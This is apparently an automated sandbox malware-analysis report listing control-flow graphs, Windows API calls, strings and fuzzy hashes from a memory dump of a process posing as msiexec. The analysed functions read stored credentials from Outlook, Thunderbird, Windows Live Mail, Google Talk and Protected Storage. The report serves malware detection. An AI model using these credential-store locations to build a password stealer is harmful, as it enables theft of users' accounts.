                                                                      control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 137 408432-40844e 132->137 138 40842d-408431 132->138 135 408460-408464 134->135 136 408465-408482 134->136 135->136 136->133 136->134 137->130 137->132 138->137
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0040832F
                                                                      • memset.MSVCRT ref: 00408343
                                                                      • memset.MSVCRT ref: 0040835F
                                                                      • memset.MSVCRT ref: 00408376
                                                                      • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                      • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                      • strlen.MSVCRT ref: 004083E9
                                                                      • strlen.MSVCRT ref: 004083F8
                                                                      • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                      • String ID: 5$H$O$b$i$}$}
                                                                      • API String ID: 1832431107-3760989150
                                                                      • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                      • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                      • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                      • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 335 407ef8-407f01 336 407f03-407f22 FindFirstFileA 335->336 337 407f24-407f38 FindNextFileA 335->337 338 407f3f-407f44 336->338 339 407f46-407f74 strlen * 2 337->339 340 407f3a call 407f90 337->340 338->339 342 407f89-407f8f 338->342 343 407f83 339->343 344 407f76-407f81 call 4070e3 339->344 340->338 346 407f86-407f88 343->346 344->346 346->342
                                                                      APIs
                                                                      • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                      • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                      • strlen.MSVCRT ref: 00407F5C
                                                                      • strlen.MSVCRT ref: 00407F64
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: FileFindstrlen$FirstNext
                                                                      • String ID: ACD
                                                                      • API String ID: 379999529-620537770
                                                                      • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                      • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                      • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                      • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • memset.MSVCRT ref: 00401E8B
                                                                      • strlen.MSVCRT ref: 00401EA4
                                                                      • strlen.MSVCRT ref: 00401EB2
                                                                      • strlen.MSVCRT ref: 00401EF8
                                                                      • strlen.MSVCRT ref: 00401F06
                                                                      • memset.MSVCRT ref: 00401FB1
                                                                      • atoi.MSVCRT(?), ref: 00401FE0
                                                                      • memset.MSVCRT ref: 00402003
                                                                      • sprintf.MSVCRT ref: 00402030
                                                                      • memset.MSVCRT ref: 00402086
                                                                      • memset.MSVCRT ref: 0040209B
                                                                      • strlen.MSVCRT ref: 004020A1
                                                                      • strlen.MSVCRT ref: 004020AF
                                                                      • strlen.MSVCRT ref: 004020E2
                                                                      • strlen.MSVCRT ref: 004020F0
                                                                      • memset.MSVCRT ref: 00402018
                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                      • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                      • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                      • API String ID: 3833278029-4223776976
                                                                      • Opcode ID: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                      • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                      • Opcode Fuzzy Hash: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                      • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                        • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                        • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                        • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                      • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                      • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                      • API String ID: 745651260-375988210
                                                                      • Opcode ID: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                      • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                      • Opcode Fuzzy Hash: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                      • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                      • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                      • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                      • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                      Strings
                                                                      • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                      • pstorec.dll, xrefs: 00403C30
                                                                      • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                      • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                      • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                      • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                      • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                      • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                      • PStoreCreateInstance, xrefs: 00403C44
                                                                      • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                      • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                      • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                      • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                      • API String ID: 1197458902-317895162
                                                                      • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                      • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                      • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                      • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 237 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->237 235->234 236 444c75-444c7e 235->236 239 444c80-444c85 236->239 240 444c9f-444ca3 236->240 245 444d02-444d0d __setusermatherr 237->245 246 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 237->246 239->234 243 444c8c-444c93 239->243 240->234 241 444ca5-444ca7 240->241 244 444cad-444cb0 241->244 243->234 247 444c95-444c9d 243->247 244->237 245->246 250 444da4-444da7 246->250 251 444d6a-444d72 246->251 247->244 252 444d81-444d85 250->252 253 444da9-444dad 250->253 254 444d74-444d76 251->254 255 444d78-444d7b 251->255 257 444d87-444d89 252->257 258 444d8b-444d9c GetStartupInfoA 252->258 253->250 254->251 254->255 255->252 256 444d7d-444d7e 255->256 256->252 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                      • String ID: k:v
                                                                      • API String ID: 3662548030-4078055367
                                                                      • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                      • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                      • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                      • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • memset.MSVCRT ref: 0044430B
                                                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                        • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                        • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                        • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                      • memset.MSVCRT ref: 00444379
                                                                      • memset.MSVCRT ref: 00444394
                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                      • strlen.MSVCRT ref: 004443DB
                                                                      • _strcmpi.MSVCRT ref: 00444401
                                                                      Strings
                                                                      • \Microsoft\Windows Mail, xrefs: 00444329
                                                                      • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                      • Store Root, xrefs: 004443A5
                                                                      • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                      • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                      • API String ID: 3203569119-2578778931
                                                                      • Opcode ID: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                      • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                      • Opcode Fuzzy Hash: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                      • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 290 40ccd7-40cd06 ??2@YAPAXI@Z 291 40cd08-40cd0d 290->291 292 40cd0f 290->292 293 40cd11-40cd24 ??2@YAPAXI@Z 291->293 292->293 294 40cd26-40cd2d call 404025 293->294 295 40cd2f 293->295 297 40cd31-40cd57 294->297 295->297 299 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 297->299 300 40cd59-40cd60 DeleteObject 297->300 300->299
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                      • String ID:
                                                                      • API String ID: 2054149589-0
                                                                      • Opcode ID: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                      • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                      • Opcode Fuzzy Hash: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                      • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 307 40ba28-40ba3a 308 40ba87-40ba9b call 406c62 307->308 309 40ba3c-40ba52 call 407e20 _mbsicmp 307->309 331 40ba9d call 4107f1 308->331 332 40ba9d call 404734 308->332 333 40ba9d call 404785 308->333 334 40ba9d call 403c16 308->334 314 40ba54-40ba6d call 407e20 309->314 315 40ba7b-40ba85 309->315 320 40ba74 314->320 321 40ba6f-40ba72 314->321 315->308 315->309 316 40baa0-40bab3 call 407e30 324 40bab5-40bac1 316->324 325 40bafa-40bb09 SetCursor 316->325 323 40ba75-40ba76 call 40b5e5 320->323 321->323 323->315 327 40bac3-40bace 324->327 328 40bad8-40baf7 qsort 324->328 327->328 328->325 331->316 332->316 333->316 334->316
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Cursor_mbsicmpqsort
                                                                      • String ID: /nosort$/sort
                                                                      • API String ID: 882979914-1578091866
                                                                      • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                      • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                      • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                      • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • memset.MSVCRT ref: 004109F7
                                                                        • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                        • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                      • memset.MSVCRT ref: 00410A32
                                                                      • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                      • String ID:
                                                                      • API String ID: 3143880245-0
                                                                      • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                      • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                      • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                      • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 358 44b33b-44b342 359 44b344-44b34a ??3@YAXPAX@Z 358->359 360 44b34b-44b352 358->360 359->360 361 44b354-44b35a ??3@YAXPAX@Z 360->361 362 44b35b-44b362 360->362 361->362 363 44b364-44b36a ??3@YAXPAX@Z 362->363 364 44b36b-44b372 362->364 363->364 365 44b374-44b37a ??3@YAXPAX@Z 364->365 366 44b37b 364->366 365->366
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@
                                                                      • String ID:
                                                                      • API String ID: 613200358-0
                                                                      • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                      • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                      • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                      • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 367 410dbb-410dd2 call 410d0e 370 410dd4-410ddd call 4070ae 367->370 371 410dfd-410e1b memset 367->371 378 410ddf-410de2 370->378 379 410dee-410df1 370->379 372 410e27-410e35 371->372 373 410e1d-410e20 371->373 376 410e45-410e4f call 410a9c 372->376 373->372 375 410e22-410e25 373->375 375->372 380 410e37-410e40 375->380 386 410e51-410e76 call 410d3d call 410add 376->386 387 410e7f-410e92 _mbscpy 376->387 378->371 382 410de4-410de7 378->382 385 410df8 379->385 380->376 382->371 384 410de9-410dec 382->384 384->371 384->379 388 410e95-410e97 385->388 386->387 387->388
                                                                      APIs
                                                                        • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                        • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                      • memset.MSVCRT ref: 00410E10
                                                                      • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                      Strings
                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                      • API String ID: 119022999-2036018995
                                                                      • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                      • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                      • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                      • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 393 4085d2-408605 call 44b090 call 4082cd call 410a9c 400 4086d8-4086dd 393->400 401 40860b-40863d memset call 410b62 393->401 404 4086c7-4086cc 401->404 405 408642-40865a call 410a9c 404->405 406 4086d2 404->406 409 4086b1-4086c2 call 410b62 405->409 410 40865c-4086ab memset call 410add call 40848b 405->410 406->400 409->404 410->409
                                                                      APIs
                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                        • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                        • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                      • memset.MSVCRT ref: 00408620
                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                      • memset.MSVCRT ref: 00408671
                                                                      Strings
                                                                      • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
                                                                      • String ID: Software\Google\Google Talk\Accounts
                                                                      • API String ID: 3996936265-1079885057
                                                                      • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                      • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                      • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                      • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 441 40ce70-40cea1 call 4023b2 call 401e69 446 40cea3-40cea6 441->446 447 40ceb8 441->447 448 40ceb2 446->448 449 40cea8-40ceb0 446->449 450 40cebd-40cecc _strcmpi 447->450 453 40ceb4-40ceb6 448->453 449->453 451 40ced3-40cedc call 40cdda 450->451 452 40cece-40ced1 450->452 454 40cede-40cef7 call 40c3d0 call 40ba28 451->454 458 40cf3f-40cf43 451->458 452->454 453->450 462 40cef9-40cefd 454->462 463 40cf0e 454->463 464 40cf0a-40cf0c 462->464 465 40ceff-40cf08 462->465 466 40cf13-40cf30 call 40affa 463->466 464->466 465->466 468 40cf35-40cf3a call 40c580 466->468 468->458
                                                                      APIs
                                                                        • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                      • _strcmpi.MSVCRT ref: 0040CEC3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: strlen$_strcmpimemset
                                                                      • String ID: /stext
                                                                      • API String ID: 520177685-3817206916
                                                                      • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                      • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                      • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                      • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                      APIs
                                                                        • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                      • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc
                                                                      • String ID:
                                                                      • API String ID: 145871493-0
                                                                      • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                      • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                      • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                      • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                      APIs
